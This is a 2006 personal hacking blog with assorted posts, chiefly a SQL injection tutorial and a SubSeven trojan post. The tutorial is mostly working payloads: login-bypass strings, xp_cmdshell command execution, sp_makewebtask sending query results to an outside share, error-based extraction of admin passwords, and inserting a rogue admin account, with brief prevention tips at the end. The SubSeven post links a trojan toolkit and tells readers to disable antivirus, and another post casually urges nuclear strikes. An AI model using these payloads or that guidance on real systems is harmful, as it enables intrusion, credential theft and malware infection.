<body><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d31145619\x26blogName\x3dThe+Lone+Hacker\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dSILVER\x26layoutType\x3dCLASSIC\x26searchRoot\x3dhttp://christekthelonehacker.blogspot.com/search\x26blogLocale\x3den_US\x26v\x3d2\x26homepageUrl\x3dhttp://christekthelonehacker.blogspot.com/\x26vt\x3d-708102094719021241', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe" }); } }); </script>

The Lone Hacker

A view on the world, among other things.

Netscape.com Hacked!

Wednesday, July 26, 2006

"Tom Way is the sexiest man alive." reads this hacked-in dialog box on Netscape.com.

Recently after Netscape.com started their Digg-like service, a vulnerability in the XSS system was exploited by Digg users. Read/see it here.

Netscape.com here.

Hack This Site!

I know, I know. You WANT TO HACK NOW! Well, more than just "another hacking wargames site," hackthissite.org stands out from the rest. Quoted from the front page:

"Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills. More than just another hacker wargames site, we are a living, breathing community with many active projects in development, with a vast selection of hacking articles and a huge forum where users can discuss hacking, network security, and just about everything. Tune in to the hacker underground and get involved with the project.

First timers should read the HTS Project Guide and create an account to get started. "

Here are some other links:
About the Project
Bill of Rights
Legal Disclaimer
Pass us around!

And also, I give it my new "ChrisTek's Seal of Approval", LOL, which I will get a graphic for in future, but this site gets

☼☼☼☼☼ 5 Stars!

Sketching

Tuesday, July 25, 2006
Recently I have been extremely bored, and taken to my old habit of sketching. Found an interesting-yet-easy-to-draw manga called Shaman King (I guess it's a TV show too?!) And have done about six sketches. I also found a nifty site called DeviantART, where I can organize and display them. Soooo, check out christek.deviantart.com!

SubSeven

Sunday, July 16, 2006
One serious threat is spyware. And I don't mean the wimpy ad-ware variety that pops up ads on your PC. I mean SubSeven, Trojans, etcetera. Serious stuff. Now, SubSeven, one of the worst spywares to get, allows total remote control of your PC, right down to editing the registry. It is also invisible. No taskbar icons, no ads, only a few values and a server app, which usually destroys itself after launching. It can also be disguised as ANY type of file, changing icons, names, ectetera. For a demo of SubSeven, download the Hacker's Toolkit, from

http://www4.rapidupload.com/d.php?file=dl&filepath=1594

Disclaimer: I am not responsible for what you do with the programs provided above. They are for examination and demo purposes only. This pack contains many trojans, backdoors, spywares, etcetera. Use at your own risk.

Now that I covered that, you must stop your antivirus from deleting most of that file, for it contains many trojans, backdoors, spywares, etcetera. One of the folders in that ZIP file contains both SubSeven apps, server and client. Open the client, and witness what this baby can do. Awesome! Very powerful. It even gives you an option to run it on your own computer! Now drag the client app to your desktop to use it.

SubSeven provides an option to run a demo on your own computer. Use it to see what SubSeven can really do. To remove SubSeven if it has infected your computer, launch your Antivirus software and it should remove it. If not, go to Start > Run > regedit

Search for SubSeven. Sure enough, the registry keys are actually labeled SubSeven. Delete the needed keys from the registery, and restart. Simple as that! And SubSeven gets:

☼☼ 2 Stars!

Steel Pans

Saturday, July 15, 2006
Do you know what is amazing? The ability of a cut-off, dented steel drum to make awesome music. Don't beleive me? Meet the steel pan. As you can see, on this model, the notes (dents) are individually labeled. Another piece of trivia, this drum is the national instrument of Trinidad, Africa, (it's an island) between Africa and South America. Look it up some time. For some tourist info, check out http://www.visittnt.com/. Pretty nice site! They even have an entire section dedicated to the steel pan, found at http://www.visittnt.com/pan.html. Cool!

North Korea

Friday, July 14, 2006
And now for a worldview. I beleive if North Korea launches a missile with a nuclear warhead at anyone, the US should blow the he** out of them with nukes.

Another thing. Why the heck are we destroying our ICBMs?!?! (For those uneducated, Intercontinental Ballistic Missiles... Blow things up anywhere in the world)

Why? What's the use of warheads if you can't shoot people with them?!?

Maybe you guys can shed some light on it.

SQL Injection

Today I'll show you some simple steps to learn some simple concepts about a simple intrusion method. This will help you protect your server from possible attacks. Disclaimer: I am not responsible nor held liable for any actions you attempt using this information.

When a server only has the web port (usually 80 or 8080) opened, and the server is relatively secure, then a possible intruder must turn to hacking. One simple method using an SQL equipped server (used for many database driven web apps, such as forums or login screens) is to use a technique called "SQL Injection" meaning you are able to "inject" code to the SQL server. For you techies, " It takes parameters from user, and makes an SQL query to a database."

Meaning you need to find an input prompt. Like a login screen. You should look for pages that include ASP, JSP, CGI, or PHP. Look for a URL that has parameters, like

http://hackerblog.com/index.asp?id=13

Or similar. So now you found the page, test if it is vulnerable. Start off with some simple parameters, like

1=1--

or, alternatively,

test'

Type those into one of the inputs, or even the URL itself. EG

http://hackerblog.com/index.asp?id=test'

or

http://hackerblog.com/index.asp?id=1=1--

If the field is hidden, you can still download the source code and find the hidden field, fill it in like above, then save as an HTML file and execute. If you can't do that, you probably shouldn't be reading that! EG





There ya go. If it works, you will be able to login without any password, etcetera. If so, lucky you! Now we use -- because it tells the server to forget the rest of the query, in turn selecting an entire table, and from there gives you login, since it looks like you are logging in as everybody. That's the best I can explain it. Figure out the "why's?" better for yourselves if you want. Now if that doesn't work, there are several other options:

" or "a"="a
') or ('a'='a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a

The next bit here, I quote from SecuriTeam, (http://securiteam.com)

"Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'."

Alright. Now that SecuriTeam has explained how to snag some data from the server, we will go on to insert data into it.

To insert data, use INSERT INTO, EG

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

Another quote from SecuriTeam on how to prevent it from happening to you.

"Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask"

To hackers, remember it's something completely preventable by good coding practice and usually only is allowed when the developer is being lazy or sloppy.

The Lone Hacker

Hello. I would be Chris, (ChrisTek) The Lone Hacker. Bringing you junk about my opinions on the world, with a bit of... handy... computer knowledge along the way.